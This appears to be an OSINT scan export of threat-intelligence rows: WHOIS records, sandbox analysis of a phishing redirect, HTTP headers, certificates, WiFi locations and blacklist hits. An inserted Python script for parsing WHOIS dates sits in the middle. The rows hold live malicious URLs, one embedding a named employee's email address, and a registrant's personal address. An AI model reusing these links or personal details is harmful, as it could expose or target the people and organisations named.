Description: Unknown | https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js |
| 2023-05-12 03:15:09 | Similar Domain - Whois | No | Whois | 2 | 0 | 2 | 0 | None | Domain Name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: https://www.namecheap.com/
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrar: NameCheap, Inc.
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: Capital Region
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: IS
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:15:08Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: battleb0t.wtf
Registry Domain ID: 210affc107bd4562ba433c931d79c2d0-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: e8887bc7fc7c4eb4aed3e14ba45fe97d.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-11T13:15:09.13Z <<<
For more information on Whois status codes, please visit https://icann.org/epp | battleb0t.wtf |
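The "Similar Domain - Whois" row above carries two records for battleb0t.wtf, the registry copy and the registrar copy, which disagree in small ways: sub-second precision on the dates, and a `0001-01-01T00:00:00.00Z` placeholder where the registrar has no update date. The script below is an added example (not part of this scan export or of any scanner module) that merges both records and derives the triage flags an analyst reads off such output: domain age at scan time, registration term, privacy proxy, and DNSSEC. `SAMPLE_WHOIS` is a constructed reduction of the two records; `SCAN_TIME` is the row's "Date Found"; the 180-day "young" threshold is this example's own assumption.

```python
"""Age and registration checks over WHOIS text (added example, not part of the
scan export); thresholds below are this example's own assumptions."""
import re
from datetime import datetime, timezone

# Constructed sample: the registry record and the registrar record from the
# battleb0t.wtf row above, reduced to the lines this script reads.
SAMPLE_WHOIS = """Domain Name: battleb0t.wtf
Registrar: NameCheap, Inc.
Updated Date: 2023-02-15T17:41:17Z
Creation Date: 2023-02-10T17:40:28Z
Registry Expiry Date: 2024-02-10T17:40:28Z
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
Domain name: battleb0t.wtf
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2023-02-10T17:40:28.99Z
Registrar Registration Expiration Date: 2024-02-10T17:40:28.99Z
Registrar: NAMECHEAP INC
"""

# 'Date Found' of the Whois row above, used as the reference time.
SCAN_TIME = datetime(2023, 5, 12, 3, 15, 9, tzinfo=timezone.utc)
YOUNG_DAYS = 180  # assumption: domains younger than this get a 'young' flag

_DATE_RE = re.compile(
    r"^(Creation Date|Updated Date|Registry Expiry Date|"
    r"Registrar Registration Expiration Date):\s*(\S+)", re.M | re.I)
_ISO_RE = re.compile(r"^(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})(?:\.(\d+))?Z$")


def parse_whois_date(value):
    """Both timestamp shapes on this page: 'YYYY-MM-DDTHH:MM:SSZ' (registry)
    and 'YYYY-MM-DDTHH:MM:SS.ffZ' (registrar). The registrar's
    0001-01-01T00:00:00.00Z is a 'never updated' sentinel and yields None."""
    value = value.strip()
    if value.startswith("0001-01-01"):
        return None
    m = _ISO_RE.match(value)
    if m is None:
        raise ValueError("unsupported WHOIS date: " + value)
    base, frac = m.groups()
    micro = (frac or "0").ljust(6, "0")[:6]
    return datetime.fromisoformat(f"{base}.{micro}+00:00")


def whois_summary(text, now):
    """Merge the dates of every record in text (registry and registrar copies
    may differ by sub-second precision) and derive triage flags."""
    dates = {}
    for key, value in _DATE_RE.findall(text):
        d = parse_whois_date(value)
        if d is None:
            continue
        k = key.lower()
        if k.startswith("creation"):
            dates["created"] = min(dates.get("created", d), d)
        elif k.startswith("updated"):
            dates["updated"] = max(dates.get("updated", d), d)
        else:
            dates["expires"] = max(dates.get("expires", d), d)
    name = re.search(r"^Domain Name:\s*(\S+)", text, re.M | re.I)
    org = re.search(r"^Registrant Organization:\s*(.+)$", text, re.M | re.I)
    dnssec = re.search(r"^DNSSEC:\s*(\S+)", text, re.M | re.I)
    created, expires = dates.get("created"), dates.get("expires")
    age_days = (now - created).days if created else None
    term_days = (expires - created).days if created and expires else None
    return {
        "domain": name.group(1).lower() if name else None,
        "created": created.isoformat() if created else None,
        "age_days": age_days,
        "term_days": term_days,
        "privacy_proxy": bool(org and "privacy" in org.group(1).lower()),
        "dnssec_unsigned": bool(dnssec and dnssec.group(1).lower() == "unsigned"),
        "young": age_days is not None and age_days < YOUNG_DAYS,
        "minimum_term": term_days is not None and term_days <= 366,
    }


if __name__ == "__main__":
    for k, v in whois_summary(SAMPLE_WHOIS, SCAN_TIME).items():
        print(f"{k}: {v}")
```

For the row above this yields a 90-day-old domain on a one-year term behind a privacy proxy with DNSSEC unsigned; none of those is malicious by itself, but together they are the profile an analyst weighs before following a look-alike name further.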
| 2023-05-12 02:45:57 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 4 | 0 | None | 39.0469, -77.4903 | 2600:1f18:2489:8202::c8 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | github.com | www.github.com |
| 2023-05-12 03:24:29 | Company Name | No | Company Name Extractor | 0 | 0 | 4 | 0 | None | Netlify\, Inc | C=US,ST=California,L=San Francisco,O=Netlify\, Inc,CN=*.netlify.app |
| 2023-05-12 02:54:35 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}, {u'url': u'https://zip.co/us/quadpay-terms-of-service', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 31, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://llink.to/?u=https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:7548:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7548:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "InternetShortcutMutex"\n "Local\\SM0:7436:304:WilStaging_02"\n "SM0:7436:304:WilStaging_02"\n "SM0:7436:120:WilError_01"\n "Local\\SM0:7436:120:WilError_01"\n "SM0:7548:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "Local\\SM0:7548:304:WilStaging_02"\n "Local\\SM0:7548:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:7548:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:7548:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:443"\n "172.66.40.106:443"\n 
"185.88.152.184:443"\n "35.186.254.174:443"\n "104.18.11.207:443"\n "172.67.71.45:443"\n "172.217.12.99:443"\n "142.251.214.131:443"\n "20.50.80.209:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.salesflare.com"\n "rabetsanatkoosha.com"\n "track.salesflare.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com" as clean (type is "HTML document ASCII text")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', 
u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsllink.tou_https%3A%2F%2Frabetsanatkoosha.com%2FSNS%2Fheineken.com%2Fjurgen.mulder%40heineken.com" has type "HTML document ASCII text"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Extension Scripts\\000003.log]- [targetUID: 00000000-00007548]\n "tokenized-card.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\Tokenized-Card\\tokenized-card.bundle.js]- [targetUID: 00000000-00007548]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_1401701815\\manifest.fingerprint]- [targetUID: 00000000-00007548]\n "wallet-crypto.html" has type "HTML document ASCII text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\wallet-crypto.html]- [targetUID: 00000000-00007548]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\index]- [targetUID: 00000000-00006060]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00007548]\n "f_00023e" has type "gzip compressed data max compression original size modulo 2^32 411849"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\f_00023e]- [targetUID: 00000000-00006060]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping7548_266231901\\json\\i18n-ec\\ar\\strings.json]- [targetUID: 
| 185.199.109.153 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Content_Type": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Pragma": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Content_Type": ["text/html; charset=\"utf-8\""], "Set_Cookie": ["cprelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "cpsession=%3a1TMQH6MZEuqlLsFz%2c7387de1c8dd6f13e5f0cbf314c13b1f5; HttpOnly; path=/; port=2082", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2082", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2082"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Pragma": ["no-cache"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:24:50 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | China | Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com/
Updated Date: 2023-01-20T18:05:08.0Z
Creation Date: 2022-12-18T04:19:38.0Z
Registry Expiry Date: 2031-12-18T23:59:59.0Z
Registrar: Name.com, Inc
Registrar IANA ID: 625
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Registrant Organization:
Registrant State/Province: YN
Registrant Country: CN
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: NS1CNB.NAME.COM
Name Server: NS2KNZ.NAME.COM
Name Server: NS3CNA.NAME.COM
Name Server: NS4BLX.NAME.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: jrupp@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:09:26.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: 007316.XYZ
Registry Domain ID: D339018444-CNIC
Registrar WHOIS Server: whois.name.com
Registrar URL: http://www.name.com
Updated Date: 2023-01-20T18:05:08Z
Creation Date: 2022-12-18T04:19:38Z
Registrar Registration Expiration Date: 2031-12-18T23:59:59Z
Registrar: Name.com, Inc.
Registrar IANA ID: 625
Reseller:
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Aaron Young
Registrant Organization:
Registrant Street: 408 Longquan Rd.
Registrant City: KM
Registrant State/Province: YN
Registrant Postal Code: 650000
Registrant Country: CN
Registrant Phone: Non-Public Data
Registrant Email: https://www.name.com/contact-domain-whois/007316.xyz/registrant
Registry Admin ID: Not Available From Registry
Admin Name: Aaron Young
Admin Organization:
Admin Street: 408 Longquan Rd.
Admin City: KM
Admin State/Province: YN
Admin Postal Code: 650000
Admin Country: CN
Admin Phone: Non-Public Data
Admin Email: https://www.name.com/contact-domain-whois/007316.xyz/admin
Registry Tech ID: Not Available From Registry
Tech Name: Aaron Young
Tech Organization:
Tech Street: 408 Longquan Rd.
Tech City: KM
Tech State/Province: YN
Tech Postal Code: 650000
Tech Country: CN
Tech Phone: Non-Public Data
Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
The data in the Name.com, Inc. WHOIS database is provided by Name.com, Inc. for information purposes, and to assist persons in obtaining information about or related to a domain name registration record. Name.com, Inc. does not guarantee its accuracy. Users accessing the Name.com, Inc. WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers and b) enable high volume, automated, electronic processes that send queries or data to the systems of Name.com, Inc., except as reasonably necessary to register domain names or modify existing registrations. When using the Name.com, Inc. WHOIS service, please consider the following: the WHOIS service is not a replacement for standard EPP commands to the SRS service. WHOIS is not considered authoritative for registered domain objects. The WHOIS service may be scheduled for downtime during production or OT&E maintenance periods. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis, for accessing the withheld data. Access to this data can be requested by submitting a request via the form found at https://www.name.com/layered-access-request . Name.com, Inc. reserves the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
|
| 2023-05-12 02:46:24 | Malicious IP Address | Yes | MetaDefender | 0 | 1 | 3 | 0 | None | webroot.com [104.196.30.220] | 104.196.30.220 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | CA-IL (Net ID: 00:00:C5:FA:44:D4) | 41.8781, -87.6298 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | no_ssid (Net ID: 00:00:85:9E:97:C1) | 41.8781, -87.6298 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | GWS (Net ID: 00:06:25:A0:D7:AA) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:18 | Affiliate Description - Abstract | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Cloudflare, Inc. is an American company that provides content delivery network services, cloud cybersecurity, DDoS mitigation, and ICANN-accredited domain registration services. Cloudflare's headquarters are located in San Francisco, California. According to The Hill, it is used by more than 20 percent of the entire Internet for its web security services as of 2022. | skip.ns.cloudflare.com |
| 2023-05-12 02:54:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:62:27:a6:dc:16:28:de:ae:a0:a4:7d:7e:a0:02:81:25:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 18 21:24:59 2022 GMT
Not After : Mar 18 21:24:58 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1A:29:A0:EB:78:CC:40:89:5B:55:A3:66:D6:68:C3:AE:DF:AB:BB:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:13:01 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-th.github.io]
https://www.openphish.com/feed.txt | 0-th.github.io |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.42): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:33 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.93): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Internet Archive Account (Category: misc)
https://archive.org/details/@login | login |
| 2023-05-12 02:46:00 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 3 | 0 | None | 37.751, -97.822 | 172.67.168.252 |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0000magda0000.github.io | 185.199.111.153 |
| 2023-05-12 03:12:12 | Co-Hosted Site - Domain Whois | No | Whois | 3 | 0 | 4 | 0 | None | Domain Name: RATHOOK.CC
Registry Domain ID: 163793658_DOMAIN_CC-VRSN
Registrar WHOIS Server: whois.porkbun.com
Registrar URL: http://porkbun.com
Updated Date: 2022-09-07T10:53:59Z
Creation Date: 2021-09-13T01:07:39Z
Registry Expiry Date: 2024-09-13T01:07:39Z
Registrar: Porkbun LLC
Registrar IANA ID: 1861
Registrar Abuse Contact Email: abuse@porkbun.com
Registrar Abuse Contact Phone: 5038508351
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: CURITIBA.NS.PORKBUN.COM
Name Server: FORTALEZA.NS.PORKBUN.COM
Name Server: MACEIO.NS.PORKBUN.COM
Name Server: SALVADOR.NS.PORKBUN.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:11:56Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the
expiration date of the domain name registrant's agreement with the
sponsoring registrar. Users may consult the sponsoring registrar's
Whois database to view the registrar's reported date of expiration
for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign's ("VeriSign") Whois
database is provided by VeriSign for information purposes only, and to
assist persons in obtaining information about or related to a domain name
registration record. VeriSign does not guarantee its accuracy.
By submitting a Whois query, you agree to abide by the following terms of
use: You agree that you may use this Data only for lawful purposes and that
under no circumstances will you use this Data to: (1) allow, enable, or
otherwise support the transmission of mass unsolicited, commercial
